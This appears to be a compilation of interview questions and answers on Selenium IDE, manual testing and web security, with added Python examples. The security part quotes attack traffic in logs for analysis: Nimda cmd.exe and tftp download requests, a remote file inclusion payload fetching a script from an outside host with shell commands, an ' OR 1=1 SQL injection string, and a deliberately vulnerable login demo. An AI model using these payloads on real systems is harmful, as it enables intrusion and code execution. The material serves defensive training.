In the above example the flight confirmation number changes each time you run the test case, so the value can be written with a regular expression as shown below:

Command: verifyText
Target: //font/font/b/font[1]
Value: regexp:Flight Confirmation # [0-9]{4}-[0-9]{2}-[0-9]{5,10}

 

29. What are the regular expression patterns available in Selenium?

Selenium regular expression patterns offer the same wide array of special characters that exist in JavaScript. Below are a subset of those special characters

PATTERN MATCH
. any single character
[ ] character class: any single character that appears inside the brackets
* quantifier: 0 or more of the preceding character (or group)
+ quantifier: 1 or more of the preceding character (or group)
? quantifier: 0 or 1 of the preceding character (or group)
{1,5} quantifier: 1 through 5 of the preceding character (or group)
| alternation: the character/group on the left or the character/group on the right
( ) grouping: often used with alternation and/or quantifier
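The three pattern types of questions 27 to 29 (globbing, regexp, exact) as an added Python example; this is not code from the original post or from the Selenium project, and it makes the following assumptions: a value with no prefix is treated as a glob (as Selenium IDE does), "regexpi:" is the case-insensitive variant of "regexp:", only * and ? are special in globs, and regexp patterns are applied as a search rather than anchored, so ^ and $ are needed when the whole string must match. The sample text is the flight confirmation value from question 28.

```python
import re

# Added example (not from the original post or the Selenium project): a small
# implementation of the three Selenese pattern types. Assumptions: no prefix
# means glob; only * and ? are special in a glob; "regexp:" is a search, not
# an anchored match, so use ^ and $ for a whole-string check.


def _glob_to_regex(glob: str) -> str:
    """Translate a Selenese glob into an anchored regular expression."""
    parts = []
    for ch in glob:
        if ch == "*":
            parts.append(".*")       # match anything, including nothing
        elif ch == "?":
            parts.append(".")        # match exactly one character
        else:
            parts.append(re.escape(ch))
    return "^" + "".join(parts) + "$"


def selenese_match(pattern: str, actual: str) -> bool:
    """Return True when `actual` satisfies the Selenese `pattern`."""
    if pattern.startswith("regexp:"):
        return re.search(pattern[len("regexp:"):], actual, re.DOTALL) is not None
    if pattern.startswith("regexpi:"):
        flags = re.DOTALL | re.IGNORECASE
        return re.search(pattern[len("regexpi:"):], actual, flags) is not None
    if pattern.startswith("exact:"):
        return actual == pattern[len("exact:"):]
    if pattern.startswith("glob:"):
        pattern = pattern[len("glob:"):]
    return re.match(_glob_to_regex(pattern), actual, re.DOTALL) is not None


def verify_text(actual_text: str, expected_pattern: str) -> str:
    """Model the verifyText check: report PASS or FAIL instead of aborting the test."""
    return "PASS" if selenese_match(expected_pattern, actual_text) else "FAIL"


if __name__ == "__main__":
    page_text = "Flight Confirmation # 2011-05-02451"   # constructed sample
    print(verify_text(page_text, "Flight Confirmation # 2011-05-02451"))
    print(verify_text(page_text, "regexp:Flight Confirmation # [0-9]{4}-[0-9]{2}-[0-9]{5,10}"))
    print(verify_text(page_text, "Flight Confirmation # *"))
```

The glob form is the one to reach for when only a suffix or number varies; the regexp form is needed when the shape of the varying part matters, as with the date-like confirmation number above.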

 

30. What is Selenese?

The set of Selenium commands used for running the tests is called Selenese.

There are three types of Selenese, those are:
1. Actions – used for performing the operations and interactions with the target elements
2. Assertions – used as check points
3. Accessors – used for storing the values in a variable

 

31. How do you add check points or verification points in Selenium?

Check points or verification points are known as Assertions in Selenium. Commands with the prefixes listed below are used for adding check points or verification points:

1. verify
2. assert
3. waitFor

 

32. What is Assertion in Selenium?

Assertion is nothing but a check or verification point.

Assertion verifies the state of the application conforms to what is expected.
Examples include "make sure the page title is X" and "verify that this checkbox is checked".

 

33. What are the types of Assertions there in Selenium?

Selenium Assertions can be used in 3 modes:

1) assert – When an "assert" fails, the test is aborted. If you are executing a test suite, the next test case will start.

2) verify – When a “verify” fails, the test will continue execution, logging the failure.

3) waitFor – “waitFor” commands wait for some condition to become true (which can be useful for testing Ajax applications). They will succeed immediately if the condition is already true. However, they will fail and halt the test if the condition does not become true within the current timeout setting

 

34. When to use Assert, Verify and WaitFor in Selenium?

1) assert – If the expected value is mandatory for continuing with the next set of steps, we use assert. Since assert aborts the test when the expected value doesn't match, it is good for any mandatory checks.

2) verify – If the expected value is optional for continuing with the next set of steps, we use verify. Since verify continues with the next set of steps even when the expected value doesn't match, it is good for any optional checks.

3) waitFor – If the test needs to wait while the expected value is not yet matching, we use waitFor. We normally use waitFor for AJAX-style controls that load within a page.

 

35. What is an Accessor in Selenium?

An Accessor is one of the types of Selenese.

I. Accessors are used for storing the value of a target in a variable.

Ex:
1) storeTitle – Stores the title of a window in a variable

2) storeText – Stores the target element text in a variable

II. Accessors are also used for evaluating the result and storing the result in a variable

Ex: storeTextPresent – Evaluates whether the text is present in the current window. If the text is present it stores true in the variable, else false

Ex: storeElementPresent – Evaluates whether the element is present in the current window. If the element is present it stores true in the variable, else false

 

36. When to use Accessors in Selenium?

Accessors are mostly used for storing the value in a variable.

The variable can be used for following reasons:

1) To get the value from an element and comparing with some dynamic value

2) To take a logical decision to execute the test steps
ex: if the value of the variable is true, execute step1 and step2, else step3 and step4

3) To execute some statements in a loop based on the value returned by the element

 

37. How to capture bitmaps in Selenium?

Bitmaps are captured using Selenium commands. There are two modes of capturing bitmaps:

1) Capture the bitmap of the entire page – captures the browser's main page area of the AUT
2) Capture a screen shot – captures the entire screen, like the print screen key on your keyboard

Selenium doesn't support capturing a bitmap of a single element of the AUT.

 

38. Which are the commands used for capturing the bitmaps?

captureEntirePageScreenshot
Saves the entire contents of the current window canvas to a PNG file. Contrast this with the captureScreenshot command, which captures the contents of the OS viewport (i.e. whatever is currently being displayed on the monitor), and is implemented in the RC only. Currently this only works in Firefox when running in chrome mode, and in IE non-HTA using the EXPERIMENTAL “Snapsie” utility. The Firefox implementation is mostly borrowed from the Screengrab! Firefox extension. Please see captureEntirePageScreenshot for more details

captureEntirePageScreenshotAndWait
Saves the entire contents of the current window canvas to a PNG file and then waits for the page to load. Contrast this with the captureScreenshot command, which captures the contents of the OS viewport (i.e. whatever is currently being displayed on the monitor), and is implemented in the RC only. Currently this only works in Firefox when running in chrome mode, and in IE non-HTA using the EXPERIMENTAL "Snapsie" utility. The Firefox implementation is mostly borrowed from the Screengrab! Firefox extension. Please see captureEntirePageScreenshot for details.

Note: This command runs only with Mozilla Firefox when you run the tests from RC; other browsers are not supported.

 

39. What is the difference between captureEntirePageScreenshot and CaptureScreenShot?

captureEntirePageScreenshot
1. Captures the AUT web page only
2. Supports only Mozilla Firefox
3. Accepts two arguments: the file name to save to and the background colour

captureScreenshot

1. Captures the system screen shot
2. Supports all browsers when you run from Selenium RC
3. Accepts one argument: the file name to save to

 

40. How do you set user extensions in Selenium IDE?

1. Open user-extensions.js with an editor (Notepad, etc.); it’s found in the selenium\core\scripts folder. If it doesn’t exist, just create it.
2. If you need to, commit the user-extensions.js file (like if you use subversion).
3. Open Selenium IDE and choose the Options menu and then Options… from that menu.
4. Make sure the path to your user-extensions.js file is entered in the Selenium Core extensions field (like \selenium\core\scripts\user-extensions.js)
5. Press OK button on options
6. Restart the IDE to reflect your extensions.

Note: After reopening, Selenium IDE may show compilation errors if the user-extensions.js file has any syntax errors.

 

41. What are the limitations of Selenium IDE?

The limitations of Selenium IDE are:

1) Selenium IDE uses only the HTML language
2) Conditional or branching statements, such as if and select statements, cannot be executed
3) Looping statements are not possible directly in the Selenium HTML language in the IDE
4) Reading from external files like .txt or .xls is not possible
5) Reading from external databases is not possible with the IDE
6) There is no exception handling
7) Neatly formatted reporting is not possible with the IDE

To eliminate the above issues we use Selenium RC

 

ValueLabs (Hyderabad) Manual Testing – Written test Questions and Answers

Time: 90 Minutes ( 25 Questions)

Prepared by Rakesh Hansalia

1) What is Composite Primary Key.

  • A primary key can consist of one or more columns of a table. When two or more columns are used as a primary key, they are called a composite key. Each single column's data can be duplicated, but the combined values of these columns cannot be duplicated.
  • For example, if you have a Student table and a Course table, and one student can select many courses and one course can be selected by many students, this is a many-to-many relationship. So you need to create a third table to define the relationship, say StudentCourse. It is important to note that you only need StudentID and CourseID in this table, as a composite key. You do not need an extra identity ID column to uniquely identify each row, because an ID column alone is not sufficient: it cannot prevent the same student selecting the same course from being inserted into this table.
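The StudentCourse case above as an added example, using an in-memory SQLite schema constructed here (not part of the original answer sheet): the same enrolment pairs are inserted into a table that has only an identity column and into one with a composite primary key on (StudentID, CourseID), to show that only the second design rejects the duplicate pair while still letting each column value repeat on its own.

```python
import sqlite3

# Added example, not from the original page: constructed schema comparing a
# surrogate-key-only join table with a composite-key join table.


def build_schema() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Student (StudentID INTEGER PRIMARY KEY, Name  TEXT NOT NULL);
        CREATE TABLE Course  (CourseID  INTEGER PRIMARY KEY, Title TEXT NOT NULL);

        -- Design A: identity column only. Every row is unique by ID, so
        -- nothing prevents a repeated (StudentID, CourseID) pair.
        CREATE TABLE StudentCourse_IdentityOnly (
            ID        INTEGER PRIMARY KEY AUTOINCREMENT,
            StudentID INTEGER NOT NULL REFERENCES Student(StudentID),
            CourseID  INTEGER NOT NULL REFERENCES Course(CourseID)
        );

        -- Design B: composite primary key on the pair.
        CREATE TABLE StudentCourse (
            StudentID INTEGER NOT NULL REFERENCES Student(StudentID),
            CourseID  INTEGER NOT NULL REFERENCES Course(CourseID),
            PRIMARY KEY (StudentID, CourseID)
        );

        INSERT INTO Student VALUES (1, 'Asha'), (2, 'Ravi');
        INSERT INTO Course  VALUES (10, 'Databases'), (20, 'Security');
    """)
    return conn


def count_rows(conn: sqlite3.Connection, table: str) -> int:
    return conn.execute("SELECT COUNT(*) FROM " + table).fetchone()[0]


def enrol_all(conn: sqlite3.Connection, pairs) -> dict:
    """Insert each (StudentID, CourseID) pair into both designs and report what survived."""
    rejected_by_composite = 0
    for student_id, course_id in pairs:
        conn.execute(
            "INSERT INTO StudentCourse_IdentityOnly (StudentID, CourseID) VALUES (?, ?)",
            (student_id, course_id),
        )
        try:
            conn.execute("INSERT INTO StudentCourse VALUES (?, ?)", (student_id, course_id))
        except sqlite3.IntegrityError:
            # "UNIQUE constraint failed": the composite key rejected the duplicate pair.
            rejected_by_composite += 1
    conn.commit()
    return {
        "identity_only_rows": count_rows(conn, "StudentCourse_IdentityOnly"),
        "composite_rows": count_rows(conn, "StudentCourse"),
        "rejected_by_composite": rejected_by_composite,
        # A single key column may still repeat: student 1 is in two courses.
        "student_1_courses": conn.execute(
            "SELECT COUNT(*) FROM StudentCourse WHERE StudentID = 1").fetchone()[0],
    }


def demo_result() -> dict:
    # Constructed input: the last pair duplicates the first.
    return enrol_all(build_schema(), [(1, 10), (1, 20), (2, 10), (1, 10)])


if __name__ == "__main__":
    print(demo_result())
```

With the duplicate pair, the identity-only table ends up with four rows and the composite-key table with three, which is the difference the answer above describes.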

2) Difference between Table and View

Views are essentially logical table-like structures populated on the fly by a given query. The results of a view query are not stored anywhere on disk and the view is recreated every time the query is executed. Materialized views are actual structures stored within the database and written to disk. They are updated based on the parameters defined when they are created.

A view uses a query to pull data from the underlying tables.

A materialized view is a table on disk that contains the result set of a query.

3) Difference between ECP and BVA

In one line: ECP does not include the boundary values of the class partitions. For example, if we have three classes 1-20, 21-40 and 41-60, then in ECP we do not include the values 1, 20, 21, 40, 41 and 60, whereas in BVA we include them as well.

4) Difference between Test Scenario and Test Case

A test case is a condition that is executed, with a predefined set of steps and known inputs, to check for an expected output. Generally a test case has:

1) Precondition
2) Steps to execute
3) Input data
4) Expected output
5) Status (Pass/Fail)

A test scenario is a set of test cases. For example, withdrawing money from an ATM machine is a scenario. But to withdraw money you need to execute many test cases, provide many inputs and get many outputs, and finally your money with a receipt of the transaction.

A test scenario is 'what to be tested' and a test case is 'how to be tested'.

5) Explain V -model

6) High Priority test cases for ATM application

 

1. Machine is accepting ATM card

2. Machine is rejecting expired card

3. successful entry of PIN number

4. unsuccessful operation due to enter wrong PIN number 3 times

5. successful selection of language

6. successful selection of account type

7. unsuccessful operation due to invalid account type

8. successful selection of amount to be withdraw

9. successful withdrawal.

10. Expected message due to amount is greater than day limit

11. unsuccessful withdraw operation due to lack of money in ATM

12. Expected message due to amount to withdraw is greater than possible balance.

13. unsuccessful withdraw operation due to click cancel after insert card

14. Check ATM machine is able to print receipts

15. Withdraw amount should be in the multiples of 100

7) Different DDL and DML commands

Data Definition Language (DDL) is a computer language used to define data structures [ALTER, COMMENT, DROP, CREATE].
Data Manipulation Language (DML) is used for managing the data in relational database management systems (RDBMS); its most popular form is the Structured Query Language (SQL) [UPDATE, DELETE, LOCK, INSERT, SELECT].

 9) Is functional Testing and System testing Same?

I would say no, it is not the same.

- System testing is testing of the application as a whole, whereas functional testing is testing of the application's functionality.

- System testing is one of the phases of testing in the SDLC.

For example, in a typical V model, unit testing is performed in the development phase, followed by integration testing, and when the software is ready it is deployed to the QA environment to perform "system testing".

System testing is end-to-end application testing.

Functional testing is a type of testing. It means testing the various functionalities of the application (individual or integrated); the other type is non-functional testing.

In the system testing phase both functional and non-functional testing are performed.

- Most people think functional testing and system testing are the same. But they differ slightly: functional testing verifies software by checking it against the design specification documents, while system testing validates software by checking it against the user requirements.

10) Bug life cycle states

  • Open
  • Fixed
  • Closed
  • Reopen
  • Obsolete


11) Tell me 3 different Software Configuration Management Tools

http://www.software-pointers.com/en-configuration-tools.html

I've used VSS (Visual SourceSafe from Microsoft) & Tortoise when I was in iGATE Patni, Gandhinagar.

12) difference between Bug,error,defect

Bug : It is found in the development environment before the product is shipped to the respective customer.

Error : It is the Deviation from actual and the expected value.

Defect : It is found in the product itself after it is shipped to the respective customer.

13) What are the test deliverable in SDLC, when to deliver what doc?

Test cases Documents
Test Plan
Testing Strategy
Test Scripts
Test Data
Test Trace-ability Matrix
Test Results/reports
Test summary report
Install/config guides
Defect Report
Release notes

14) Tell me the concepts present in Test plan.

Refer this link : https://rakeshhansalia.wordpress.com/2012/05/14/test-plan-preparation-for-manual-testing/

15) What are the main issues found in browser compatibility testing?

Alignment issues, JS errors, image display problems, Ajax issues

16) bug life cycle

New bug found > QA logs a bug (Open state) > DEV fixes the bug (Fixed state) > QA tests it (Closed if OK, or Reopen if it fails)

17) Which is a test case optimization method?

1) BVA 2) functional testing 3) incremental testing 4) big bang

Ans: BVA ( Boundary value Analysis)

18) difference between the delete and  truncate command

 

• DELETE and TRUNCATE are both logged operations. But DELETE is logged on a per-row basis, whereas TRUNCATE logs only the deallocation of the data pages in which the data exists. You can't roll back data in TRUNCATE, but in DELETE you can roll back. TRUNCATE removes (deletes) the records permanently.

• You cannot TRUNCATE a table that has any foreign key constraints. You will have to remove the constraints, TRUNCATE the table, and reapply the constraints.

19) integration testing would done after system testing

a) true b) false

Ans: False

 

20) what is static method

There are two types of methods.

  • Instance methods are associated with an object and use the instance variables of that object. This is the default.
  • Static methods use no instance variables of any object of the class they are defined in. If you define a method to be static, the compiler will give you a rude message if you try to access any instance variables. You can access static variables, but except for constants this is unusual. Static methods typically take all their data from parameters and compute something from those parameters, with no reference to instance variables. This is typical of methods which do some kind of generic calculation. Good examples of this are the many utility methods in the predefined Math class.

 

 

All the Best Yaarooooooo

 

Web Security Interview Questions

April 30, 2012

The goal of this document is to provide appropriate questions for HR/Managers to pose to individuals who are applying for web security related positions.  These questions do not have right or wrong answers, but rather spark relevant conversation between the applicant and the hiring staff.

 

Entry Level Questions

 

1. What do you see as the most critical and current threats affecting Internet-accessible websites?

 

Goal of question – To gauge the applicant’s knowledge of current web related threats.  Topics such as Denial of Service, Brute Force, Buffer Overflows, and Input Validation are all relevant topics.  Hopefully they will mention information provided by web security organizations such as the Web Application Security Consortium (WASC) or the Open Web Application Security Project (OWASP).

 

 

2. What online resources do you use to keep abreast of web security issues?  Can you give an example of a recent web security vulnerability or threat?

 

Goal of question – Determine if the applicant utilizes computer security resources such as CERT, SANS Internet Storm Center or ICAT.  Email lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good resources. Recent examples of threats will vary depending on current events, but issues such as new web based worms (PHP Santy Worm) or applications, which are in wide use (awstats scripts) are acceptable.

 

3. What do you see as challenges to successfully deploying/monitoring web intrusion detection?

 

Goal of question – We are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS issues such as:

 

  • Limitations of NIDS for web monitoring (SSL, semantic issues with understanding HTTP)
  • Proper logging – increasing the verboseness of logging (Mod_Security audit_log)
  • Remote Centralized Logging
  • Alerting Mechanisms
  • Updating Signatures/Policies

 

 

4. What is your definition of the term "Cross-Site Scripting"?  What is the potential impact to servers and clients?

 

Goal of question – This question will determine if the applicant is well versed in the terminology used in web security.  The applicant needs to be able to articulate highly technological topics to a wide audience.  The second question will help to verify that the applicant fully understands how XSS attacks work and the impact to client information.  WASC has a web security glossary of terms that may be of help – http://www.webappsec.org/glossary.html

 

 

Cross-Site Scripting: (Acronym – XSS) An attack technique that forces a web site to echo client-supplied data, which executes in a user's web browser. When a user is Cross-Site Scripted, the attacker will have access to all web browser content (cookies, history, application version, etc). XSS attacks do not typically directly target the web server or application, but are rather aimed at the client.  The web server is merely used as a conduit for the XSS data to be presented to the end client. See also "Client-Side Scripting".

 

 

5. What are the most important steps you would recommend for securing a new web server? Web application?

 

Goal of question – Once again, there is no right or wrong answer, however we are interested in what the applicant views as important.

 

Web Server Security:

  • Update/Patch the web server software
  • Minimize the server functionality – disable extra modules
  • Delete default data/scripts
  • Increase logging verboseness
  • Update Permissions/Ownership of files

 

Web Application Security:

  • Make sure Input Validation is enforced within the code – Security QA testing
  • Configured to display generic error messages
  • Implement a software security policy
  • Remove or protect hidden files and directories

 

 

Advanced Level Questions

 

1. Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server.  What does the log entry suggest has happened?  What would you do in response to this entry?

 

68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"

68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 566 "-" "-"

 

Goal of question – To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF).  In this scenario, the client system (68.48.142.117) is infected with the Nimda worm.  These requests will not affect our Apache proxy server since this is a Microsoft vulnerability.  While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200).  The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful.  Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.

 

If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?

 

You could use either Microsoft’s Internet and Security Acceleration (ISA) server as a front-end proxy or implement URLScan on the target IIS server.  The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.
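The reading of those two log lines, as an added Python example (not part of the original page): a Common Log Format parser plus the triage rule the answer describes, namely that a cmd.exe request answered with 200 by the proxied backend is the one that needs the internal IIS server inspected, and that a tftp request in the path marks the second stage. The sample log is constructed from the two entries in the question plus two further lines; the path regex is an assumption covering the request shapes shown above, not a complete signature set.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Added example (not from the original page). The path regex and the sample
# lines below are constructed from the entries quoted in the question.

CLF_LINE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Request shapes seen in the worm traffic above: cmd.exe reached via system32.
WORM_REQUEST = re.compile(r'(?i)cmd\.exe|/winnt/system32/')


@dataclass
class Finding:
    client: str
    path: str
    status: int
    needs_backend_check: bool   # True when the proxied server answered 200
    stage: str                  # "probe" or "tftp-download"


def parse_clf(line: str) -> Optional[dict]:
    """Split one CLF line into its fields; None when the line is not CLF."""
    m = CLF_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def triage(lines: List[str]) -> List[Finding]:
    """Flag worm-style requests; a 200 means the backend accepted the request."""
    findings = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None or not WORM_REQUEST.search(rec["path"]):
            continue
        stage = "tftp-download" if "tftp" in rec["path"].lower() else "probe"
        findings.append(Finding(rec["client"], rec["path"], rec["status"],
                                rec["status"] == 200, stage))
    return findings


# Constructed sample: the two entries from the question, a normal request,
# and the same probe answered with 404 by a patched backend.
SAMPLE_LOG = [
    r'68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"',
    r'68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 566 "-" "-"',
    r'10.0.0.5 - - [09/Mar/2004:22:24:01 -0500] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"',
    r'192.0.2.9 - - [09/Mar/2004:22:25:10 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 212 "-" "-"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

The 404 line is the contrast case: the same probe, but the backend refused it, so it is logged for awareness rather than queued for an inspection of the proxied server.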

 

 

2. You are engaged in a penetration-test where you are attempting to gain access to a protected location.  You are presented with this login screen:

 

What are some examples of you how you would attempt to gain access?

 

Goal of question – Determine if the applicant has a wide knowledge of different authentication vulnerabilities.  They may attempt default usernames/passwords or attempt SQL Injection queries that provide an SQL true statement (such as – ‘ OR 1=1#).  If they provide SQL examples, then offer them the following Error document information and ask them what this indicates.

 

ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near '='.
Data Source = "ECommerceTheArchSupport2"
SQL = "SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId ="
The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file K:\InetPub\clients\login\http\ailment.cfm
The specific sequence of files included or processed is:
K:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM

This error message indicates that the target web application is running Microsoft SQL Server behind a ColdFusion front end (the CFQUERY element and the .cfm template), that the user-supplied value is concatenated straight into the query text rather than bound as a parameter (the WHERE clause ends at "QuickJumpId =" with nothing after it, which is why SQL Server reports a syntax error near '='), and that verbose error handling discloses the data source name, the full query text and the server's directory structure (K:\InetPub\clients\login\http\). Each of these details helps an attacker craft a working injection.
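To make the injection concrete, here is an added example (not part of the original question set) that reproduces the concatenated-query pattern the error document reveals, beside the parameterised form that fixes it. It uses an in-memory SQLite database with constructed users rather than the ECommerceTheArchSupport2 data source; SQLite, like SQL Server, uses -- as its comment marker, which is why the payload below ends in -- rather than #. The vulnerable version also echoes the failed query back, the way the verbose ColdFusion error page does.

```python
import sqlite3

# Constructed sample data; not the page's ECommerceTheArchSupport2 data source.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (login, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, login, password):
    """Builds the statement by string concatenation, the pattern the error
    document above reveals. Returns (authenticated, detail); on a SQL error the
    detail echoes the query, as a verbose error page would."""
    sql = ("SELECT id FROM users WHERE login = '" + login +
           "' AND password = '" + password + "'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as e:
        return False, "SQL = %r, error = %s" % (sql, e)   # information disclosure
    return row is not None, ""

def login_safe(conn, login, password):
    """Parameterised query: the input is bound as a value and can never
    change the structure of the statement, so no quoting trick applies."""
    row = conn.execute("SELECT id FROM users WHERE login = ? AND password = ?",
                       (login, password)).fetchone()
    return row is not None, ""

if __name__ == "__main__":
    db = make_db()
    # ' OR 1=1-- closes the string, adds an always-true clause and comments out
    # the password check, so every row matches.
    for name, fn in (("vulnerable", login_vulnerable), ("safe", login_safe)):
        print(name, "alice/s3cret:", fn(db, "alice", "s3cret")[0],
              " ' OR 1=1--/x:", fn(db, "' OR 1=1--", "x")[0])
    print("single quote leaks:", login_vulnerable(db, "'", "x")[1])
```

Against the real target the same probe would be a lone quote in the login field: the fact that the application returned the ODBC error rather than a generic failure page is what tells the tester the parameter is injectable.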

 

 

3. What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?

========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 -0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "uname\x20-a" at POST_PAYLOAD
mod_security-action: 403

65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a


Goal of question – to verify that the applicant can interpret various web log files, identify attacks and assess their possible impact. The Mod_Security Apache module wrote this entry to its audit_log: the first block is the CLF-style request line and the handler, followed by the complete request headers and the 65-byte POST body, which a plain access log would never record. The body shows an attempt to exploit a PHP remote file inclusion vulnerability in the index.php script: the lid parameter points at a remote "lila.jpg" (a PHP script given an image extension) and the cmd parameter carries the OS commands the included script is expected to run. This attack was not successful, for the following two reasons:

• The mod_security-message header shows that Mod_Security denied the request with a 403 (the status in the request line confirms it) because a converted Snort web-attack rule matched "uname -a" in the POST payload. The request never reached index.php.
• The attacker also made a typo in the OS commands being passed in the POST payload: there is no semicolon ";" between the ls and uname commands. Even if the request had reached a vulnerable index.php, the shell would have tried to run a non-existent "lsuname" command with the argument "-a", and the uname output the attacker wanted would never have come back.
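As an added example (not part of the original page), the following Python parses a Mod_Security 1.x audit_log entry like the one above, pulls the parameters out of the POST body, and reports the remote file inclusion and command injection indicators together with whether Mod_Security blocked the request. The audit entry is a constructed copy of the one in the question with the headers trimmed to the ones that matter; the shell_commands() helper shows why the lsuname typo matters.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed copy of the audit_log entry discussed above (headers trimmed).
# A blank line separates the request headers from the POST body.
SAMPLE_ENTRY = r'''Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 -0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
mod_security-message: Access denied with code 403. Pattern match "uname\x20-a" at POST_PAYLOAD
mod_security-action: 403

lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
'''

def parse_audit_entry(text):
    """Split one audit_log entry into status, request line, headers and body."""
    lines = text.splitlines()
    status = int(re.search(r'" (\d{3}) (?:\d+|-)$', lines[0]).group(1))
    # The raw request starts right after the dashed separator line.
    start = next(i for i, l in enumerate(lines) if l.startswith("-----")) + 1
    request_line = lines[start]
    headers, i = {}, start + 1
    while i < len(lines) and lines[i] != "":
        name, _, value = lines[i].partition(":")
        headers[name.strip().lower()] = value.strip()
        i += 1
    body = "\n".join(lines[i + 1:]).strip()
    return {"status": status, "request_line": request_line,
            "headers": headers, "body": body}

def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into (name, value) pairs."""
    params = []
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return params

# Shell metacharacters that chain or substitute commands.
SHELL_META = re.compile(r"[;|`&]|\$\(")

def shell_commands(value):
    """Command names a POSIX shell would run for a ';'-separated string."""
    return [seg.split()[0] for seg in value.split(";") if seg.strip()]

def analyse(entry):
    """Flag RFI (a parameter carrying a URL) and OS command injection, and
    report whether Mod_Security blocked the request."""
    findings = []
    for name, value in parse_form(entry["body"]):
        if urlsplit(value).scheme in ("http", "https", "ftp"):
            findings.append(("remote_file_inclusion", name))
        if SHELL_META.search(value):
            findings.append(("os_command_injection", name))
    blocked = (entry["headers"].get("mod_security-action") == "403"
               and entry["status"] == 403)
    return {"blocked": blocked, "findings": findings}

if __name__ == "__main__":
    entry = parse_audit_entry(SAMPLE_ENTRY)
    print(analyse(entry))
    for name, value in parse_form(entry["body"]):
        if name == "cmd":
            print("commands the shell would try:", shell_commands(value))
```

Run against the sample entry this reports blocked=True with an RFI finding on lid and a command injection finding on cmd, and lists the commands as cd, id and lsuname, the last of which does not exist.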

 

 

4. One of your web servers is logging multiple requests similar to the following:

201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.htm HTTP/1.0" 403 769 "Microsoft Data Access Internet Publishing Provider DAV 1.1" "-"

What does this log entry indicate? How could you identify what the contents are of the "hacked.htm" file that the attacker is trying to upload?

Goal of question – Determine if the applicant can identify both the attack (a web defacement attempt using the HTTP PUT method, sent from a WebDAV client, as the "Microsoft Data Access Internet Publishing Provider" user agent shows), as well as the logging limitations of CLF. The 403 tells us the server refused the upload. In this type of attack, however, the defacement text is sent in the request body and not on the URL request line, and CLF records only the request line, status code and response size, never the body. To see that data you need something that captures the whole request: a network sniffing application, or a full-request logger such as the Mod_Security audit log. With Snort, a custom rule that matches the PUT request line and tags the rest of the session, so that the body in the packets that follow is captured alongside the alert, would look like this –

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"LOCAL Put attempt"; flow:to_server,established; tag:session,50,packets; pcre:"/^PUT /A"; sid:3000001; rev:1;)
